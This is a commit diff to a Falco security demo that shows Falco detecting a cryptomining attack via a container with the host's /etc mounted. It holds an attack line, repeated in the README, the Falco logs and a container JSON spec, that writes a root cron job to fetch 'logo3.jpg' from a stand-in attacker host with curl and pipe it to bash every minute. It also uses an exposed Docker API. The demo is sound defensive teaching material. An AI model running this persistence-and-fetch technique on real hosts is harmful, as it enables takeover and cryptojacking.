Bug fixes.

examples/bad-mount-cryptomining/README.md

@@ -1,4 +1,4 @@
-#Demo of Falco Detecting Cryptomining Exploit
+# Demo of Falco Detecting Cryptomining Exploit
 
 ## Introduction
 
@@ -53,12 +53,14 @@ falco_1            | Wed Mar 14 22:37:12 2018: Parsed rules from file /etc/falco
 
 To launch the malicious container, we will connect to the docker instance running in `host-machine`, which has exposed port 2375 to the world. We create and start a container via direct use of the docker API (although you can do the same via `docker run -H http://localhost:2375 ...`.
 
-The script `launch-malicious-container.sh` performs the necessary POSTs:
+The script `launch_malicious_container.sh` performs the necessary POSTs:
 
 * `http://localhost:2375/images/create?fromImage=alpine&tag=latest`
 * `http://localhost:2375/containers/create?&name=docker123321-mysql`
 * `http://localhost:2375/containers/docker123321-mysql/start`
 
+Run the script via `bash launch_malicious_container.sh`.
+
 ### Examine cron output as malicious software is installed & run
 
 `docker123321-mysql` writes the following line to `/etc/crontabs/root` on the host:
@@ -67,7 +69,7 @@ The script `launch-malicious-container.sh` performs the necessary POSTs:
 * * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s
 ```
 
-This ensures that every minute, cron will download the script (disguised as [logo3.jpg](attacker_files/logo3.jpg))  from `attacker-server` and run it.
+It also touches the file `/etc/crontabs/cron.update` to force cron to re-read its cron configuration. This ensures that every minute, cron will download the script (disguised as [logo3.jpg](attacker_files/logo3.jpg))  from `attacker-server` and run it.
 
 You can see `docker123321-mysql` running by checking the container list for the docker instance running in `host-machine` via `docker -H http://localhost:2375 ps`. You should see output like the following:
 
@@ -102,11 +104,12 @@ host-machine_1     | runing.....
 
 ### Observe Falco detecting malicious activity
 
-To observe Falco detecting the malicious activity, you can look for `falco_1` lines in the output. Falco will detect the container launch with the sensitive mount:
+To observe Falco detecting the malicious activity, you can look for `falco_1` lines in the output. Falco will detect the container launch with the sensitive mount and the script's update of `/etc/crontabs/cron.update`:
 
 ```
 falco_1            | 22:37:24.478583438: Informational Container with sensitive mount started (user=root command=runc:[1:CHILD] init docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
 falco_1            | 22:37:24.479565025: Informational Container with sensitive mount started (user=root command=sh -c echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && sleep 300 docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
+falco_1            | 16:30:42.972199287: Error File below /etc opened for writing (user=root command=touch /etc/crontabs/cron.update parent=sh pcmdline=sh -c echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /etc/crontabs/cron.update && sleep 300 file=/etc/crontabs/cron.update name=touch gparent=<NA> ggparent=<NA> gggparent=<NA>)
 ```
 
 ### Cleanup

examples/bad-mount-cryptomining/docker123321-mysql-container.json

@@ -1,5 +1,5 @@
 {
-    "Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && sleep 300"],
+    "Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /etc/crontabs/cron.update && sleep 300"],
     "Image": "alpine:latest",
     "HostConfig": {
 	"Binds": ["/etc:/mnt/etc"]